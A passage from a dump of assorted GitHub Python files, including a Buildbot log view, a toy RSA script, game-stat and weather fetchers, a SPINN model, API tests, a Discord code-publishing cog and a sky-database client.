pb.DeadReferenceError:\n pass\n # break the cycle, the Request's .notifications list includes the\n # Deferred (from req.notifyFinish) that's pointing at us.\n self.req = None\n \n # release template\n self.template = None\n\ncomponents.registerAdapter(TextLog, interfaces.IStatusLog, IHTMLLog)\n\n\nclass HTMLLog(Resource):\n implements(IHTMLLog)\n\n def __init__(self, original):\n Resource.__init__(self)\n self.original = original\n\n def render(self, request):\n request.setHeader(\"content-type\", \"text/html\")\n return self.original.html\n\ncomponents.registerAdapter(HTMLLog, logfile.HTMLLogFile, IHTMLLog)\n\n\nclass LogsResource(HtmlResource):\n addSlash = True\n\n def __init__(self, step_status):\n HtmlResource.__init__(self)\n self.step_status = step_status\n\n def getChild(self, path, req):\n for log in self.step_status.getLogs():\n if path == log.getName():\n if log.hasContents():\n return IHTMLLog(interfaces.IStatusLog(log))\n return NoResource(\"Empty Log '%s'\" % path)\n return HtmlResource.getChild(self, path, req)\n","repo_name":"houseoflifeproperty/bitpop","sub_path":"build/third_party/buildbot_8_4p1/buildbot/status/web/logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":5674,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"23201927102","text":"\n\ndef encrypt_list(msg, n, e):\n return [((c + 100) ** e) % n for c in msg.encode('ASCII')]\n\ndef decrypt_list(cipher_list, n, d):\n codes = [((c ** d) % n) - 100 for c in cipher_list]\n msg = bytes(codes).decode('ASCII')\n return msg\n \n\ndef encrypt(msg, n, e):\n digits = int(''.join([str(c + 100) for c in msg.encode('ASCII')]))\n print(digits)\n cipher_text = (digits ** e) % n\n return cipher_text\n\n\ndef decrypt(cipher_text, n, d):\n t1 = str((cipher_text ** d) % n)\n print(t1)\n codes = [int(t1[n:n+3]) - 100 for n in range(0, len(t1), 3)]\n print(codes)\n msg = bytes(codes).decode('ASCII')\n return msg\n\n\nwith open('keys.txt', 'r') as keys:\n n, e, d = tuple(int(key[:-1]) for key in list(keys))\n\nprint('n = %d\\ne = %d\\nd = %d' % (n, e, d))\n\nmsg = input('enter message: ')\ncode = encrypt(msg, n, e)\nprint('encrypted message: ')\nprint(code)\ndecrypted = decrypt(code, n, d)\nprint('decrypted message: %s' % decrypted)\n","repo_name":"rbridges12/rsa-encryption","sub_path":"encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23011020392","text":"import re\nimport requests\nfrom functools import lru_cache\n\nGAME_DATA_ENDPOINT = 'https://127.0.0.1:2999/liveclientdata/allgamedata'\nCHAMPION_INFO_ENDPOINT = 'https://raw.communitydragon.org/latest/game/data/characters/{champion}/{champion}.bin.json'\nDEFAULT_RADIUS = 65.\nDEFAULT_WINDUP = 0.3\n\n\ndef clean_champion_name(name):\n return name.split('game_character_displayname_')[1].lower()\n\n\nclass ChampionStats():\n def __init__(self):\n game_data = requests.get(GAME_DATA_ENDPOINT, verify=False).json()\n champion_names = [clean_champion_name(player['rawChampionName']) for player in game_data['allPlayers']]\n self.champion_data = {}\n for champion in champion_names:\n champion_response = requests.get(CHAMPION_INFO_ENDPOINT.format(champion=champion)).json()\n # lower case everything for consistency\n self.champion_data[champion] = {k.lower(): v for k, v in champion_response.items()}\n\n @lru_cache(maxsize=None)\n def get_attack_speed(self, target):\n root_key = 'characters/{}/characterrecords/root'.format(target.lower())\n attack_speed_base = self.champion_data[target.lower()][root_key]['attackSpeed']\n attack_speed_ratio = self.champion_data[target.lower()][root_key]['attackSpeedRatio']\n return attack_speed_base, attack_speed_ratio\n\n @lru_cache(maxsize=None)\n def get_windup(self, target):\n root_key = 'characters/{}/characterrecords/root'.format(target.lower())\n basic_attack = self.champion_data[target.lower()][root_key]['basicAttack']\n windup_percent = 0.3\n windup_modifier = 0.\n if 'mAttackDelayCastOffsetPercent' in basic_attack:\n windup_percent = basic_attack['mAttackDelayCastOffsetPercent'] + DEFAULT_WINDUP\n if 'mAttackDelayCastOffsetPercentAttackSpeedRatio' in basic_attack:\n windup_modifier = basic_attack['mAttackDelayCastOffsetPercentAttackSpeedRatio']\n print(\"Windup percent: {}\".format(windup_percent))\n print(\"Windup modifier: {}\".format(windup_modifier))\n return windup_percent, windup_modifier\n\n @lru_cache(maxsize=None)\n def get_radius(self, target):\n root_key = 'characters/{}/characterrecords/root'.format(target.lower())\n return self.champion_data[target.lower()][root_key].get('overrideGameplayCollisionRadius', DEFAULT_RADIUS)\n\n def names(self):\n return self.champion_data.keys()\n\n @lru_cache(maxsize=None)\n def get_spells(self, target):\n # castRange, castFrame, mDataValues\n root_key = 'characters/{}/characterrecords/root'.format(target.lower())\n return [\n self.champion_data[target.lower()]['characters/{}/spells/{}'.format(target.lower(), spell.lower())]['mSpell']\n for spell in self.champion_data[target.lower()][root_key]['spellNames']\n ]\n\n @lru_cache(maxsize=None)\n def is_melee(self, target):\n root_key = 'characters/{}/characterrecords/root'.format(target.lower())\n identities = self.champion_data[target.lower()][root_key]['purchaseIdentities']\n return any(identity for identity in identities if identity == 'Melee')\n","repo_name":"hrt/Lmeme","sub_path":"champion_stats.py","file_name":"champion_stats.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"72"} +{"seq_id":"7014209277","text":"import sys\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\n\n\nclass QuestionMessageBox(QMessageBox):\n def __init__(self, parent, title, content):\n super(QuestionMessageBox, self).__init__(parent)\n self.setWindowTitle(title)\n self.setText(content)\n self.setIcon(QMessageBox.Question)\n\n self.addButton('是', QMessageBox.YesRole)\n self.addButton('否', QMessageBox.NoRole)\n\n\nclass Window(QWidget):\n def __init__(self):\n super(Window, self).__init__()\n self.button = QPushButton('点我')\n self.button.clicked.connect(self.change_text)\n\n h_layout = QHBoxLayout()\n h_layout.addWidget(self.button)\n self.setLayout(h_layout)\n\n def change_text(self): # 1\n msb_box = QuestionMessageBox(self, '标题', '是否改变文本?')\n msb_box.exec()\n\n if msb_box.clickedButton().text() == '是':\n self.button.setText('文本改变')\n\n\nif __name__ == '__main__':\n app = QApplication([])\n window = Window()\n window.show()\n sys.exit(app.exec())","repo_name":"la-vie-est-belle/book-codes","sub_path":"第2章/示例代码2-7/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8391368228","text":"print(\"Welocome to the MPH to MPS conversion app\\n\")\r\n'''\r\nconversion\r\n1 mile = 1.6093 km\r\n1 km = 1000 m\r\n1 mile = 1,609.3 m\r\n1 hr = 60 min * 60 secs = 3600 secs\r\nmultiplying factor = 1,609.3/3600 = 0.447027778\r\n'''\r\n\r\nspeed_mph = float(input('Enter your speed in Miles per Hour (mph): '))\r\n\r\nspeed_mps = speed_mph*0.4470277778\r\n\r\nrounded_speed = round(speed_mps, 2)\r\nprint(f'Your speed is {rounded_speed} m/s')\r\n","repo_name":"vaylon-fernandes/simple-python-projects","sub_path":"mph_to_ms/mph_to_ms.py","file_name":"mph_to_ms.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16390212164","text":"import itertools\nimport copy\n\nimport numpy as np\nfrom spinn import util\n\n# PyTorch\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nfrom spinn.util.blocks import Reduce\nfrom spinn.util.blocks import LSTMState, Embed, MLP\nfrom spinn.util.blocks import bundle, unbundle, to_cpu, to_gpu, treelstm, lstm\nfrom spinn.util.blocks import get_h, get_c, get_seq_h\nfrom spinn.util.misc import Args, Vocab, Example\n\nfrom spinn.fat_stack import BaseModel as _BaseModel\nfrom spinn.fat_stack import SPINN\n\nfrom spinn.data import T_SHIFT, T_REDUCE, T_SKIP, T_STRUCT\n\n\ndef build_model(data_manager, initial_embeddings, vocab_size, num_classes, FLAGS):\n model_cls = BaseModel\n use_sentence_pair = data_manager.SENTENCE_PAIR_DATA\n\n return model_cls(model_dim=FLAGS.model_dim,\n word_embedding_dim=FLAGS.word_embedding_dim,\n vocab_size=vocab_size,\n initial_embeddings=initial_embeddings,\n num_classes=num_classes,\n mlp_dim=FLAGS.mlp_dim,\n embedding_keep_rate=FLAGS.embedding_keep_rate,\n classifier_keep_rate=FLAGS.semantic_classifier_keep_rate,\n tracking_lstm_hidden_dim=FLAGS.tracking_lstm_hidden_dim,\n transition_weight=FLAGS.transition_weight,\n encode_style=FLAGS.encode_style,\n encode_reverse=FLAGS.encode_reverse,\n encode_bidirectional=FLAGS.encode_bidirectional,\n encode_num_layers=FLAGS.encode_num_layers,\n use_sentence_pair=use_sentence_pair,\n lateral_tracking=FLAGS.lateral_tracking,\n use_tracking_in_composition=FLAGS.use_tracking_in_composition,\n predict_use_cell=FLAGS.predict_use_cell,\n use_lengths=FLAGS.use_lengths,\n use_difference_feature=FLAGS.use_difference_feature,\n use_product_feature=FLAGS.use_product_feature,\n num_mlp_layers=FLAGS.num_mlp_layers,\n mlp_bn=FLAGS.mlp_bn,\n gen_h=FLAGS.gen_h,\n )\n\n\nclass GenSPINN(SPINN):\n\n def __init__(self, args, vocab, predict_use_cell, use_lengths):\n super(GenSPINN, self).__init__(args, vocab, predict_use_cell, use_lengths)\n\n vocab_size = vocab.vectors.shape[0]\n self.inp_dim = args.size\n\n # TODO: This can be a hyperparam. Use input dim for now.\n self.decoder_dim = self.inp_dim\n\n # TODO: Include additional features for decoder, such as\n # top of the stack or tracker state.\n features_dim = self.decoder_dim\n\n self.decoder_rnn = nn.LSTM(self.inp_dim, self.decoder_dim,\n num_layers=1,\n batch_first=True,\n bidirectional=False,\n )\n\n self.decoder = nn.Linear(self.decoder_dim, vocab_size)\n\n def reset_decoder(self, example):\n \"\"\"Run decoder on input to initialize rnn states.\"\"\"\n batch_size = len(example.bufs)\n\n # TODO: Would prefer to run decoder forwards or backwards?\n batch = torch.cat([torch.cat(b, 0).unsqueeze(0) for b in example.bufs], 0)\n\n init = to_gpu(Variable(torch.zeros(1, batch_size, self.decoder_dim), volatile=not self.training))\n self.dec_h = list(torch.chunk(init, batch_size, 1))\n self.dec_c = list(torch.chunk(init, batch_size, 1))\n\n # TODO: Right now the decoder runs over the entire sentence, which is a bit like cheating!\n self.run_decoder_rnn(range(batch_size), batch)\n\n def run_decoder_rnn(self, idxs, x):\n x = get_seq_h(x, self.inp_dim)\n batch_size, seq_len, inp_dim = x.size()\n\n h_prev = torch.cat([self.dec_h[batch_idx] for batch_idx in idxs], 1)\n c_prev = torch.cat([self.dec_c[batch_idx] for batch_idx in idxs], 1)\n\n # Expects (input, h_0, c_0):\n # input => batch_size x seq_len x inp_dim\n # h_0 => (num_layers x bi[1,2]) x batch_size x model_dim\n # c_0 => (num_layers x bi[1,2]) x batch_size x model_dim\n output, (hn, cn) = self.decoder_rnn(x, (h_prev, c_prev))\n\n h_parts = torch.chunk(hn, batch_size, 1)\n c_parts = torch.chunk(cn, batch_size, 1)\n for i, batch_idx in enumerate(idxs):\n self.dec_h[batch_idx] = h_parts[i]\n self.dec_c[batch_idx] = c_parts[i]\n\n return hn, cn\n\n def shift_phase(self, tops, trackings, stacks, idxs):\n \"\"\"SHIFT: Should dequeue buffer and item to stack.\"\"\"\n\n # Generative Component.\n if len(stacks) > 0:\n h_prev = torch.cat([self.dec_h[batch_idx] for batch_idx in idxs], 1)\n c_prev = torch.cat([self.dec_h[batch_idx] for batch_idx in idxs], 1)\n\n if self.training:\n # First predict, then run one step of RNN in preparation for next decode.\n w = self.decoder(h_prev.squeeze(0))\n logits = F.log_softmax(w)\n target = np.array([self.tokens[batch_idx].pop() for batch_idx in idxs])\n\n self.memory['gen_logits'] = logits\n self.memory['gen_target'] = target\n\n # Run decoder one step in preparation for next shift phase.\n self.run_decoder_rnn(idxs, torch.cat(tops, 0).unsqueeze(1))\n\n # TODO: Experiment adding the predicted the word to the stack rather than\n # the top of the buffer.\n\n if len(stacks) > 0:\n shift_candidates = iter(tops)\n for stack in stacks:\n new_stack_item = next(shift_candidates)\n stack.append(new_stack_item)\n\n def loss_phase_hook(self):\n if self.training:\n target = np.array(reduce(lambda x, y: x + y.tolist(),\n [m[\"gen_target\"] for m in self.memories if \"gen_target\" in m], []))\n logits = torch.cat([m[\"gen_logits\"] for m in self.memories if \"gen_logits\" in m], 0)\n\n # TODO: Probably only the first or last words have any chance of being predicted.\n # Calculate loss.\n target = torch.from_numpy(target).long()\n self.gen_loss = nn.NLLLoss()(logits, Variable(target, volatile=not self.training)) / target.size(0)\n\n # Calculate accuracy.\n pred = logits.data.max(1)[1].cpu() # get the index of the max log-probability\n self.gen_acc = pred.eq(target).sum() / float(target.size(0))\n\n def forward(self, example, use_internal_parser=False, validate_transitions=True):\n tokens = example.tokens.data.numpy().tolist()\n tokens = [list(reversed(t)) for t in tokens]\n self.tokens = tokens\n\n self.reset_decoder(example)\n\n return super(GenSPINN, self).forward(\n example, use_internal_parser=use_internal_parser, validate_transitions=validate_transitions)\n\n\nclass BaseModel(_BaseModel):\n\n def __init__(self, gen_h=None, **kwargs):\n self.gen_h = gen_h\n super(BaseModel, self).__init__(**kwargs)\n\n def build_spinn(self, args, vocab, predict_use_cell, use_lengths):\n return GenSPINN(args, vocab, predict_use_cell, use_lengths)\n\n def output_hook(self, output, sentences, transitions, y_batch=None):\n pass\n\n def get_features_dim(self):\n features_dim = super(BaseModel, self).get_features_dim()\n if self.gen_h:\n features_dim += self.spinn.decoder_dim\n return features_dim\n\n def build_features(self, h):\n features = super(BaseModel, self).build_features(h)\n if self.gen_h:\n decoder_h = torch.cat(self.spinn.dec_h, 0).squeeze()\n features = torch.cat([features, decoder_h], 1)\n return features\n","repo_name":"woojinchung/lms","sub_path":"python/spinn/gen_spinn.py","file_name":"gen_spinn.py","file_ext":"py","file_size_in_byte":7498,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"27703827800","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : 接口自动化测试.py\n# @Author: huifer\n# @Date : 2018-3-6\nimport json\n\nimport requests\nimport unittest\nfrom urllib import parse\n\n\n# url = \"http://127.0.0.1:8060/api/v1.0/\"\n# ins = parse.urljoin(url, 'getall')\n# print(ins)\n# r = requests.get(ins)\n# print(r.json()['status'])\n\n\nclass GetEventListTest(unittest.TestCase):\n def setUp(self):\n self.url = \"http://127.0.0.1:8060/api/v1.0/\"\n\n @unittest.skip('暂时test_get_data_all的测试')\n def test_get_data_all(self):\n \"\"\"查询所有\"\"\"\n ins = parse.urljoin(self.url, 'getall')\n r = requests.get(ins)\n result = r.json()\n self.assertEqual(result['status']['code'], 200)\n self.assertEqual(result['status']['message'], \"OK\")\n\n @unittest.skip('暂时test_get_data_one的测试')\n def test_get_data_one(self):\n ins = parse.urljoin(self.url, 'getid/2')\n r = requests.get(ins)\n result = r.json()\n self.assertEqual(result['status']['code'], 200)\n self.assertEqual(result['status']['message'], \"OK\")\n self.assertEqual(result['data']['description'], \"Need to find a good Python tutorial on the web\")\n self.assertEqual(result['data']['done'], False)\n self.assertEqual(result['data']['id'], 2)\n self.assertEqual(result['data']['title'], \"Learn Python\")\n\n @unittest.skip('暂时跳过test_del_one用例2的测试')\n def test_del_one(self):\n ins = parse.urljoin(self.url, 'delone/1')\n r = requests.delete(ins)\n result = r.json()\n self.assertEqual(result['status']['code'], 204)\n self.assertEqual(result['status']['message'], \"NO CONTENT\")\n\n @unittest.skip('暂时跳过test_create_one用例2的测试')\n def test_create_one(self):\n ins = parse.urljoin(self.url, 'create')\n payload = {u\"title\": 123}\n headers = {'Content-Type': 'application/json',\n 'accept': \"application/json\"\n }\n\n r = requests.post(ins, data=json.dumps(payload), headers=headers, verify=False)\n\n\n def test_authenticate(self):\n ins = parse.urljoin(self.url, 'sec')\n r = requests.get(ins, auth=('admin', 'admin'))\n result = r.json()\n self.assertEqual(result['status']['code'], 200)\n self.assertEqual(result['status']['message'], \"OK\")\n\n\n\nif __name__ == '__main__':\n # unittest.main()\n suite = unittest.TestSuite()\n suite.addTest(GetEventListTest(\"test_authenticate\"))\n runner = unittest.TextTestRunner()\n runner.run(suite)\n","repo_name":"huifer/Automated_Framework","sub_path":"src/接口自动化测试.py","file_name":"接口自动化测试.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8496321083","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 22 14:33:38 2017\n\n@author: paul\n\"\"\"\n\nfrom weatherTLKT import Weather\n\ntyp='ens'\n\nfor ss in range(1,9):\n if typ=='solo':\n mydate='20171127'\n website='http://nomads.ncep.noaa.gov:9090/dods'\n model='gfs'\n resolution='0p25'\n url=website+'/'+model+'_'+resolution+'/'+model+mydate+'/'+model+'_'+resolution+'_00z'\n pathToSaveObj='../data/'+ model+mydate+'_'+resolution\n \n else : \n mydate='20171127'\n website='http://nomads.ncep.noaa.gov:9090/dods'\n model='gens'\n resolution='0p25'\n num_scenario='0'+str(ss)\n url=website+'/'+model+'/'+model+mydate+'/'+'gep'+num_scenario+'_00z'\n pathToSaveObj='../data/'+ model+mydate+'_'+num_scenario\n \n latBound=[43,50]\n lonBound=[-10+360, 360]\n \n \n Weather.download(url,pathToSaveObj,latBound=latBound,lonBound=lonBound,timeSteps=[0,85],ens=True)\n\n","repo_name":"PBarde/IBoat-PMCTS","sub_path":"code/model/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"12024635472","text":"import sys\nfrom time import time\n\nfrom ._core import blue, bold, pprint, red, width, wrap_text\n\n\nclass session_line:\n \"\"\"\n Print the elapsed time after the execution of a block of code.\n \"\"\"\n\n def __init__(self, desc=\"Running... \", disable=False):\n self._disable = disable\n self._tstart = None\n self._desc = desc\n self.elapsed = None\n\n def __enter__(self):\n self._tstart = time()\n if not self._disable:\n sys.stdout.write(self._desc)\n sys.stdout.flush()\n return self\n\n def __exit__(self, exception_type, exception_value, traceback):\n from humanfriendly import format_timespan\n from limix.__config__ import get_info\n\n self.elapsed = time() - self._tstart\n fail = exception_type is not None\n\n if not self._disable:\n if get_info(\"rich_text\") and not get_info(\"building_doc\"):\n # New line, get back to previous line, and advance cursor to the end\n # of the line. This allows us to always get back to the right cursor\n # position, as long as the cursor is still in the correct line.\n print(\"\\n\\033[1A\\033[{}C\".format(len(self._desc)), end=\"\")\n if fail:\n msg = bold(red(\"failed\"))\n msg += \" ({}).\".format(format_timespan(self.elapsed))\n pprint(msg)\n else:\n print(\"done (%s).\" % format_timespan(self.elapsed))\n sys.stdout.flush()\n\n\nclass session_block:\n \"\"\"\n Print session block: session start and session end.\n \"\"\"\n\n def __init__(self, session_name, disable=False):\n self._session_name = session_name\n self._start = None\n self._disable = disable\n\n def __enter__(self):\n self._start = time()\n msg = \" {} starts \".format(self._session_name)\n if not self._disable:\n msg = wrap_text(msg, width())\n pprint(bold(blue(msg)))\n\n def __exit__(self, exception_type, *_):\n elapsed = time() - self._start\n fail = exception_type is not None\n\n if fail:\n msg = \" {} fails in {:.2f} seconds \"\n color = red\n else:\n msg = \" {} ends in {:.2f} seconds \"\n color = blue\n\n msg = msg.format(self._session_name, elapsed)\n if not self._disable:\n msg = wrap_text(msg, width())\n pprint(bold(color(msg)))\n","repo_name":"andrewkern/limix","sub_path":"limix/_display/_session.py","file_name":"_session.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"17872464035","text":"import tkinter as tk\nfrom PIL import Image, ImageTk\n\n# Definindo conteúdo interno da janela do programa\nroot = tk.Tk()\n\ncanvas = tk.Canvas(root, width=1280, height=720)\n# Para um design em um grid em 3 colunas\ncanvas.grid(columnspan=3)\n\n#logo\nlogo = Image.open('assets/logo.png')\nlogo = ImageTk.PhotoImage(logo)\nlogo_label = tk.Label(image=logo)\nlogo_label.image = logo_label\nlogo_label.grid(column=0, row=0)\n\n\n\n# Definindo limite do conteúdo interno do programa\nroot.mainloop()","repo_name":"danfigueroa/ac","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14820898629","text":"# Owner(s): [\"oncall: distributed\"]\nimport os\n\nfrom torch.distributed._spmd.graph_utils import dump_graphs_to_files\nfrom torch.testing._internal.common_utils import run_tests\nfrom torch.testing._internal.distributed._tensor.common_dtensor import DTensorTestBase\n\n\nclass GraphUtilsTest(DTensorTestBase):\n @property\n def world_size(self):\n return 1\n\n def test_dump_graphs(self):\n class FakeGraph:\n def __init__(self, postfix):\n self.graph = f\"fake graph str {postfix}\"\n\n def __str__(self) -> str:\n return self.graph\n\n fake_graph1 = {\"fake_graph1\": FakeGraph(1)}\n folder = dump_graphs_to_files(fake_graph1)\n fake_graph2 = {\"fake_graph2\": FakeGraph(1)}\n new_folder = dump_graphs_to_files(fake_graph2, folder)\n self.assertEqual(folder, new_folder)\n\n for i in (1, 2):\n path = os.path.join(folder, f\"fake_graph{i}.graph\")\n self.assertTrue(os.path.exists(path))\n with open(path) as fp:\n fake_graph = fake_graph1 if i == 1 else fake_graph2\n self.assertEqual(fp.readline(), fake_graph[f\"fake_graph{i}\"].graph)\n os.remove(path)\n\n os.rmdir(folder)\n\n\nif __name__ == \"__main__\":\n if False:\n run_tests()\n","repo_name":"pytorch/pytorch","sub_path":"test/distributed/_spmd/test_graph_utils.py","file_name":"test_graph_utils.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"9709871638","text":"import aiohttp\nimport disnake\nfrom disnake.ext import commands\nfrom disnake import ApplicationCommandInteraction as ACI\nimport os\n\nclass PublishCodeModal(disnake.ui.Modal):\n def __init__(self, *args, **kwargs) -> None:\n components = [\n disnake.ui.TextInput(\n label=\"Введіть колір ембеду у форматі HEX (RRGGBB)\",\n placeholder=\"ffffff\",\n custom_id=\"color\",\n required=True,\n style=disnake.TextInputStyle.short,\n min_length=6,\n max_length=6,\n ),\n disnake.ui.TextInput(\n label=\"Введіть мову програмувания\",\n placeholder=\"c\",\n custom_id=\"language\",\n required=True,\n style=disnake.TextInputStyle.short,\n max_length=32,\n ),\n disnake.ui.TextInput(\n label=\"Введіть заголовок\",\n placeholder=\"Hello, world!\",\n custom_id=\"title\",\n required=True,\n style=disnake.TextInputStyle.short,\n max_length=100,\n ),\n disnake.ui.TextInput(\n label=\"Введіть код\",\n placeholder=\"#include <stdio.h>\\n\"\n \"int main(void)\\n\"\n \"{\\n\"\n \" puts(\\\"Hello, world!\\\");\\n\"\n \"}\\n\",\n custom_id=\"code\",\n required=True,\n style=disnake.TextInputStyle.paragraph,\n ),\n disnake.ui.TextInput(\n label=\"Введіть теги\",\n placeholder=\"#javascript #python\",\n custom_id=\"tags\",\n required=True,\n style=disnake.TextInputStyle.short,\n ),\n ]\n super().__init__(\n title=\"Публікація коду до #useful-codes\",\n custom_id=\"publishcode\",\n components=components,\n )\n async def callback(self, interaction: disnake.ModalInteraction):\n color = 0xFFFFFF\n try:\n color = int(interaction.text_values['color'], base=16)\n except:\n pass\n embed = disnake.Embed(\n color=color,\n title=interaction.text_values['title'],\n description=f\"```{interaction.text_values['language']}\\n\"\n f\"{interaction.text_values['code']}\\n\"\n \"```\",\n ).set_footer(\n text=interaction.text_values['tags'],\n ).set_author(\n name=interaction.user.name,\n icon_url=interaction.user.display_avatar,\n )\n async with aiohttp.ClientSession() as session:\n webhook = disnake.Webhook.from_url(\n url=(\"https://discord.com/api/webhooks\"\n f\"/{os.getenv('PUBLISHCODE_WEBHOOK_ID')}\"\n f\"/{os.getenv('PUBLISHCODE_WEBHOOK_TOKEN')}\"),\n session=session,\n )\n await interaction.response.defer()\n message = interaction.client.get_message(\n (await webhook.send(\n embeds=[\n embed,\n ],\n wait=True,\n )).id\n )\n await message.add_reaction('👍')\n await message.add_reaction('👎')\n await interaction.followup.send(\n content=\"✅ Успішно надіслано код!\",\n ephemeral=True,\n )\n\nclass PublishingUsefulCodes(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @staticmethod\n def can_publish(member: disnake.Member) -> bool:\n publish_roles = list(\n map(\n int,\n os.getenv('PUBLISHCODE_ROLES').split(',')\n )\n )\n return any(\n role.id in publish_roles\n for role in member.roles\n )\n \n @commands.slash_command(description=\"Надсилає ваш корисний або цікавий код до #useful-codes!\")\n async def publishcode(self, inner: ACI):\n if not self.can_publish(inner.author):\n await inner.response.send_message(\n content=\"❌ Відмовлено у доступі!\",\n ephemeral=True,\n )\n return\n await inner.response.send_modal(\n PublishCodeModal(\n title=\"Публікація коду до #useful-codes\"\n )\n ) \n\ndef setup(bot):\n bot.add_cog(PublishingUsefulCodes(bot))\n","repo_name":"razenxc/CharmCodex-bot","sub_path":"bot/commands/publishcode.py","file_name":"publishcode.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2282800464","text":"\nimport logging\nimport numpy as np\nimport os\nimport psycopg2 as pg\nimport yaml\nfrom astropy.table import Table\nfrom time import time\nfrom collections import Counter\nfrom tempfile import mkstemp\n\nlogger = logging.getLogger(__name__)\n\"\"\"\nlogger.setLevel(logging.DEBUG)\n\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nch.setFormatter(\n logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"))\n\nlogger.addHandler(ch)\n\"\"\"\n\n__all__ = [\"BaseWSDB\"]\n\nclass BaseWSDB(object):\n\n \"\"\" A base client to access the World Sky Database. \"\"\"\n\n def __init__(self, **kwargs):\n r\"\"\"\n Create a new database connection to the World Sky database.\n\n The connection parameters can be specified as a string:\n\n wsdb = WSDB(\"user=goto password=secret\")\n\n or using a set of keyword arguments:\n\n wsdb = WSDB(user=\"goto\", password=\"secret\")\n\n Or as a mix of both. The basic connection parameters are:\n\n - *dbname*: the database name\n - *database*: the database name (only as keyword argument)\n - *user*: the user name used to authenticate\n - *password*: password used to authenticate\n - *host*: database host address (defaults to UNIX socket if not given)\n - *port*: connection port number (defaults to 5432 if not given)\n \"\"\"\n\n default_configuration_filename = os.path.expanduser(\"~/.goto-wsdb.yaml\")\n if os.path.exists(default_configuration_filename):\n with open(default_configuration_filename, \"r\") as fp:\n default_configuration = yaml.load(fp)\n\n for k, v in default_configuration.items():\n kwargs.setdefault(k, v)\n\n self._default_return_as_table = True\n self._connection = pg.connect(**kwargs)\n return None\n\n\n def close(self):\n r\"\"\"\n Close the connection to the WSDB.\n \"\"\"\n return self._connection.close()\n\n\n @property\n def catalogues(self):\n r\"\"\"\n Return a cached tuple of the astronomical catalogues available.\n \"\"\"\n\n if not hasattr(self, \"_catalogues\"):\n _, results, __ = self.execute(\"\"\"\n SELECT table_name\n FROM information_schema.tables\n WHERE table_schema = 'public'\"\"\", fetch=True)\n self._catalogues = tuple([i for sl in results for i in sl])\n return self._catalogues\n\n\n def _check_catalogue(self, catalogue):\n r\"\"\"\n Check whether a catalogue is available in the WSDB.\n\n :param catalogue_name:\n The source catalogue to query. Available catalogues are accessible\n through the ``WSDB.catalogues`` attribute.\n\n :returns:\n ``True`` if the catalogue is available.\n\n :raises ValueError:\n If the catalogue is not available.\n \"\"\"\n return True\n \n if catalogue not in self.catalogues:\n raise ValueError(\"catalogue '{}' unavailable (available: {})\".format(\n catalogue, \", \".join(self.catalogues)))\n return True\n\n\n def select(self, query, values=None, **kwargs):\n r\"\"\"\n A convenience function to perform SQL select queries on the WSDB.\n\n Perform a SQL select query\n select some results.\n \"\"\"\n\n names, rows, cursor = self.execute(query, values, fetch=True, **kwargs)\n if len(rows) == 0:\n return None\n\n if kwargs.get(\"as_table\", self._default_return_as_table):\n counted_names = Counter(names)\n duplicates = [k for k, v in counted_names.items() if v > 1]\n\n prefixes = kwargs.get(\"prefixes\", True)\n use_prefixes = list(map(str, range(max(counted_names.values())))) \\\n if isinstance(prefixes, bool) else prefixes\n\n # Put the prefixes and names in the right order & format\n prefixes = [\n ([], [use_prefixes[names[:i].count(n)]])[n in duplicates] \\\n for i, n in enumerate(names)]\n names = [[n] for n in names]\n names = [\".\".join(p + n) for p, n in zip(prefixes, names)]\n return Table(rows=rows, names=names)\n\n else:\n return rows\n\n\n def execute(self, query, values=None, fetch=False, cursor=None, **kwargs):\n r\"\"\"\n Execute a SQL query on the WSDB.\n\n :param query:\n The SQL query to execute.\n\n :param values: [optional]\n Values to use when formatting the SQL string.\n\n :param fetch: [optional]\n Fetch all row results for this query (default: `False`).\n\n :returns:\n A three-length tuple containing the column names (where applicable),\n the results (if `fetch` is `True`, otherwise `None`), and the\n cursor.\n\n \"\"\"\n\n cursor_supplied = cursor is not None\n\n if not cursor_supplied:\n logger.debug(\"Creating cursor\")\n cursor = self._connection.cursor()\n\n t_init = time()\n try:\n logger.debug(\"Executing query: {} with values: {}\".format(\n query, values))\n cursor.execute(query, values)\n results = cursor.fetchall() if fetch else None\n\n except pg.ProgrammingError:\n logger.exception(\"SQL query failed: {} {}\".format(query, values))\n if not cursor_supplied:\n cursor.close()\n raise\n\n else:\n 